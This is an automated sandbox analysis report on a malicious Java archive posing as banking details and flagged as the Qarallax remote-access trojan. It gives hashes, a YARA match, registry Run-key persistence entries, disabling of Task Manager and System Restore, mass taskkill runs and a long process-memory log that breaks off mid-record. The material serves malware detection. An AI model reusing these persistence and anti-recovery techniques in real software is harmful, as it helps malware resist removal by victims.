Analysis
max time kernel: 149s
max time network: 144s
platform: windows7_x64
resource: win7
submitted: 06-08-2020 07:45
Static task: static1
Behavioral task: behavioral1
  Sample: New Banking Details.jar
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: New Banking Details.jar
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
Target: New Banking Details.jar
Size: 410KB
MD5: 7ff8c97e2fe1c972876ee4cc84238074
SHA1: fb1d4dff5cedba4dc4eb0ddf662fc9be2d39e696
SHA256: d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9
SHA512: 0531582de07c475fa4ebe358d5336ed810fcdb0adbcbcd8738a66b4aa7cd66eeb11837ce63cd534a23ff277f8a5d50e7a806675379f97e8e34cf45ede9d86759
Score: 10/10
Malware Config

Signatures

Qarallax RAT support DLL (1 IoCs)
resource | yara_rule
behavioral1/files/0x000300000001352a-7.dat | qarallax_dll
Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Sets file execution options in registry (2 TTPs)

Loads dropped DLL (1 IoCs)
pid | Process
1204 | java.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" | java.exe
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" | java.exe
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run | java.exe
Drops desktop.ini file(s) (4 IoCs)
description | ioc | Process
File opened for modification | C:\Users\Admin\hmJMe\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\hmJMe\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\hmJMe\Desktop.ini | java.exe
File created | C:\Users\Admin\hmJMe\Desktop.ini | java.exe
Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\System32\AnPpB | java.exe
File opened for modification | C:\Windows\System32\AnPpB | java.exe
Kills process with taskkill (19 IoCs)
pid | Process
1948 | taskkill.exe
1672 | taskkill.exe
1612 | taskkill.exe
1552 | taskkill.exe
456 | taskkill.exe
1928 | taskkill.exe
1460 | taskkill.exe
1344 | taskkill.exe
1836 | taskkill.exe
1636 | taskkill.exe
1828 | taskkill.exe
1340 | taskkill.exe
1480 | taskkill.exe
1616 | taskkill.exe
1180 | taskkill.exe
1952 | taskkill.exe
1036 | taskkill.exe
1472 | taskkill.exe
1884 | taskkill.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
1920 | powershell.exe
1920 | powershell.exe
Suspicious use of AdjustPrivilegeToken (100 IoCs)
description | pid | Process
Token: SeIncreaseQuotaPrivilege | 740 | WMIC.exe
Token: SeSecurityPrivilege | 740 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 740 | WMIC.exe
Token: SeLoadDriverPrivilege | 740 | WMIC.exe
Token: SeSystemProfilePrivilege | 740 | WMIC.exe
Token: SeSystemtimePrivilege | 740 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 740 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 740 | WMIC.exe
Token: SeCreatePagefilePrivilege | 740 | WMIC.exe
Token: SeBackupPrivilege | 740 | WMIC.exe
Token: SeRestorePrivilege | 740 | WMIC.exe
Token: SeShutdownPrivilege | 740 | WMIC.exe
Token: SeDebugPrivilege | 740 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 740 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 740 | WMIC.exe
Token: SeUndockPrivilege | 740 | WMIC.exe
Token: SeManageVolumePrivilege | 740 | WMIC.exe
Token: 33 | 740 | WMIC.exe
Token: 34 | 740 | WMIC.exe
Token: 35 | 740 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 740 | WMIC.exe
Token: SeSecurityPrivilege | 740 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 740 | WMIC.exe
Token: SeLoadDriverPrivilege | 740 | WMIC.exe
Token: SeSystemProfilePrivilege | 740 | WMIC.exe
Token: SeSystemtimePrivilege | 740 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 740 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 740 | WMIC.exe
Token: SeCreatePagefilePrivilege | 740 | WMIC.exe
Token: SeBackupPrivilege | 740 | WMIC.exe
Token: SeRestorePrivilege | 740 | WMIC.exe
Token: SeShutdownPrivilege | 740 | WMIC.exe
Token: SeDebugPrivilege | 740 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 740 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 740 | WMIC.exe
Token: SeUndockPrivilege | 740 | WMIC.exe
Token: SeManageVolumePrivilege | 740 | WMIC.exe
Token: 33 | 740 | WMIC.exe
Token: 34 | 740 | WMIC.exe
Token: 35 | 740 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1516 | WMIC.exe
Token: SeSecurityPrivilege | 1516 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1516 | WMIC.exe
Token: SeLoadDriverPrivilege | 1516 | WMIC.exe
Token: SeSystemProfilePrivilege | 1516 | WMIC.exe
Token: SeSystemtimePrivilege | 1516 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1516 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1516 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1516 | WMIC.exe
Token: SeBackupPrivilege | 1516 | WMIC.exe
Token: SeRestorePrivilege | 1516 | WMIC.exe
Token: SeShutdownPrivilege | 1516 | WMIC.exe
Token: SeDebugPrivilege | 1516 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1516 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1516 | WMIC.exe
Token: SeUndockPrivilege | 1516 | WMIC.exe
Token: SeManageVolumePrivilege | 1516 | WMIC.exe
Token: 33 | 1516 | WMIC.exe
Token: 34 | 1516 | WMIC.exe
Token: 35 | 1516 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1516 | WMIC.exe
Token: SeSecurityPrivilege | 1516 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1516 | WMIC.exe
Token: SeLoadDriverPrivilege | 1516 | WMIC.exe
Token: SeSystemProfilePrivilege | 1516 | WMIC.exe
Token: SeSystemtimePrivilege | 1516 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1516 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1516 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1516 | WMIC.exe
Token: SeBackupPrivilege | 1516 | WMIC.exe
Token: SeRestorePrivilege | 1516 | WMIC.exe
Token: SeShutdownPrivilege | 1516 | WMIC.exe
Token: SeDebugPrivilege | 1516 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1516 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1516 | WMIC.exe
Token: SeUndockPrivilege | 1516 | WMIC.exe
Token: SeManageVolumePrivilege | 1516 | WMIC.exe
Token: 33 | 1516 | WMIC.exe
Token: 34 | 1516 | WMIC.exe
Token: 35 | 1516 | WMIC.exe
Token: SeDebugPrivilege | 1884 | taskkill.exe
Token: SeDebugPrivilege | 1636 | taskkill.exe
Token: SeDebugPrivilege | 456 | taskkill.exe
Token: SeDebugPrivilege | 1948 | taskkill.exe
Token: SeDebugPrivilege | 1672 | taskkill.exe
Token: SeDebugPrivilege | 1928 | taskkill.exe
Token: SeDebugPrivilege | 1616 | taskkill.exe
Token: SeDebugPrivilege | 1180 | taskkill.exe
Token: SeDebugPrivilege | 1460 | taskkill.exe
Token: SeDebugPrivilege | 1920 | powershell.exe
Token: SeDebugPrivilege | 1344 | taskkill.exe
Token: SeDebugPrivilege | 1480 | taskkill.exe
Token: SeDebugPrivilege | 1952 | taskkill.exe
Token: SeDebugPrivilege | 1828 | taskkill.exe
Token: SeDebugPrivilege | 1836 | taskkill.exe
Token: SeDebugPrivilege | 1340 | taskkill.exe
Token: SeDebugPrivilege | 1036 | taskkill.exe
Token: SeDebugPrivilege | 1612 | taskkill.exe
Token: SeDebugPrivilege | 1472 | taskkill.exe
Token: SeDebugPrivilege | 1552 | taskkill.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
1204 | java.exe

Suspicious use of WriteProcessMemory (798 IoCs)
description pid Process procid_target PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 1584 1204 java.exe 25 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 1204 wrote to memory of 296 1204 java.exe 26 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 296 wrote to memory of 740 296 cmd.exe 27 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1204 wrote to memory of 1044 1204 java.exe 28 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1044 wrote to memory of 1516 1044 cmd.exe 29 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1792 1204 java.exe 30 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1380 1204 java.exe 31 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1828 1204 java.exe 32 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1180 1204 java.exe 33 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1820 1204 java.exe 34 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1764 1204 java.exe 35 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1752 1204 java.exe 36 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 1732 1204 java.exe 37 PID 1204 wrote to memory of 
1672 1204 java.exe 38 PID 1204 wrote to memory of 1672 1204 java.exe 38 PID 1204 wrote to memory of 1672 1204 java.exe 38 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1540 1204 java.exe 39 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1872 1204 java.exe 40 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1920 1204 java.exe 41 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1884 1204 java.exe 42 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1968 1204 java.exe 45 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1204 wrote to memory of 1948 1204 java.exe 46 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1672 wrote to memory of 1072 1672 cmd.exe 50 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1992 1204 java.exe 51 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1552 1204 java.exe 54 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1204 wrote to memory of 1544 1204 java.exe 55 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1672 wrote to memory of 672 1672 cmd.exe 56 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1504 1204 java.exe 58 PID 1204 wrote to memory of 1632 1204 java.exe 60 PID 1204 wrote to memory of 1632 
1204 java.exe 60 PID 1204 wrote to memory of 1632 1204 java.exe 60 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1508 1204 java.exe 62 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 1796 1204 java.exe 64 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 620 1204 java.exe 66 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1204 wrote to memory of 1340 1204 java.exe 67 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1796 wrote to memory of 1840 1796 cmd.exe 69 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 1636 1204 java.exe 70 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 2044 1204 java.exe 72 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 1880 1204 java.exe 73 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1204 wrote to memory of 2040 1204 java.exe 74 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1204 wrote to memory of 1540 1204 java.exe 77 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1796 wrote to memory of 1480 1796 cmd.exe 76 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 1872 1204 java.exe 80 PID 1204 wrote to memory of 560 1204 java.exe 83 PID 1204 wrote to memory of 560 1204 java.exe 83 PID 1204 wrote to memory of 560 1204 
java.exe 83 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 852 1204 java.exe 85 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 672 1204 java.exe 87 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1204 wrote to memory of 1076 1204 java.exe 88 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1076 wrote to memory of 1592 1076 cmd.exe 89 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1380 1204 java.exe 91 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1756 1204 java.exe 93 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1564 1204 java.exe 96 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1588 1204 java.exe 97 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 1692 1204 java.exe 99 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 456 1204 java.exe 100 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 324 1204 java.exe 103 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1904 1204 java.exe 104 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 1924 1204 java.exe 107 PID 1204 wrote to memory of 2040 1204 
java.exe 109 PID 1204 wrote to memory of 2040 1204 java.exe 109 PID 1204 wrote to memory of 2040 1204 java.exe 109 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 464 1204 java.exe 111 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1764 1204 java.exe 114 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1932 1204 java.exe 116 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1948 1204 java.exe 118 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1672 1204 java.exe 121 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1928 1204 java.exe 123 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1616 1204 java.exe 125 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1180 1204 java.exe 127 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1460 1204 java.exe 129 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1204 wrote to memory of 1344 1204 java.exe 131 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1076 wrote to memory of 760 1076 cmd.exe 133 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1164 1204 java.exe 134 PID 1204 wrote to memory of 1480 1204 java.exe 135 PID 
1204 wrote to memory of 1480 1204 java.exe 135 PID 1204 wrote to memory of 1480 1204 java.exe 135 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1628 1164 cmd.exe 137 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1164 wrote to memory of 1672 1164 cmd.exe 138 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 1204 wrote to memory of 792 1204 java.exe 139 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 1836 792 cmd.exe 140 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 792 wrote to memory of 2028 792 cmd.exe 141 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1204 wrote to memory of 1340 1204 java.exe 142 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1516 1340 cmd.exe 143 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1340 wrote to memory of 1840 1340 cmd.exe 144 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1204 wrote to memory of 1388 1204 java.exe 145 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1584 1388 cmd.exe 146 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1388 wrote to memory of 1056 1388 cmd.exe 147 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1204 wrote to memory of 1948 1204 java.exe 148 PID 1948 wrote to memory of 1520 1948 cmd.exe 149 PID 1948 wrote to memory of 1520 1948 cmd.exe 149 PID 
1948 wrote to memory of 1520 1948 cmd.exe 149 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1204 wrote to memory of 1952 1204 java.exe 150 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1948 wrote to memory of 560 1948 cmd.exe 152 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1204 wrote to memory of 1592 1204 java.exe 153 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1636 1592 cmd.exe 154 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1592 wrote to memory of 1552 1592 cmd.exe 155 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1204 wrote to memory of 1628 1204 java.exe 156 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1784 1628 cmd.exe 157 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1628 wrote to memory of 1904 1628 cmd.exe 158 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1204 wrote to memory of 1072 1204 java.exe 159 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1860 1072 cmd.exe 160 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1072 wrote to memory of 1456 1072 cmd.exe 161 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 1204 wrote to memory of 2032 1204 java.exe 162 PID 2032 wrote to memory of 296 2032 cmd.exe 163 PID 2032 wrote to memory of 296 2032 cmd.exe 163 PID 2032 wrote to memory of 296 2032 
cmd.exe 163 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 2032 wrote to memory of 844 2032 cmd.exe 164 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1204 wrote to memory of 1476 1204 java.exe 165 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1060 1476 cmd.exe 166 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1476 wrote to memory of 1644 1476 cmd.exe 167 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 1204 wrote to memory of 672 1204 java.exe 168 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 672 wrote to memory of 1480 672 cmd.exe 169 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 1204 wrote to memory of 1828 1204 java.exe 170 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 672 wrote to memory of 1840 672 cmd.exe 171 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1204 wrote to memory of 1056 1204 java.exe 173 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1520 1056 cmd.exe 174 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1056 wrote to memory of 1636 1056 cmd.exe 175 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1204 wrote to memory of 1784 1204 java.exe 176 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 464 1784 cmd.exe 177 PID 1784 wrote to memory of 1732 1784 
cmd.exe 178 PID 1784 wrote to memory of 1732 1784 cmd.exe 178 PID 1784 wrote to memory of 1732 1784 cmd.exe 178 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1204 wrote to memory of 1976 1204 java.exe 179 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1548 1976 cmd.exe 180 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1976 wrote to memory of 1544 1976 cmd.exe 181 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1204 wrote to memory of 1928 1204 java.exe 182 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1064 1928 cmd.exe 183 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1928 wrote to memory of 1684 1928 cmd.exe 184 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1204 wrote to memory of 1992 1204 java.exe 185 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 1664 1992 cmd.exe 186 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1992 wrote to memory of 2028 1992 cmd.exe 187 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1868 1204 java.exe 188 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1204 wrote to memory of 1836 1204 java.exe 189 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1480 1868 cmd.exe 191 PID 1868 wrote to memory of 1900 1868 cmd.exe 192 PID 1868 wrote to 
memory of 1900 1868 cmd.exe 192 PID 1868 wrote to memory of 1900 1868 cmd.exe 192 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 1204 wrote to memory of 560 1204 java.exe 193 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1552 560 cmd.exe 194 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 560 wrote to memory of 1904 560 cmd.exe 195 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1204 wrote to memory of 1612 1204 java.exe 196 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1036 1612 cmd.exe 197 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1612 wrote to memory of 1812 1612 cmd.exe 198 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 1204 wrote to memory of 320 1204 java.exe 199 PID 320 wrote to memory of 1616 320 cmd.exe 200 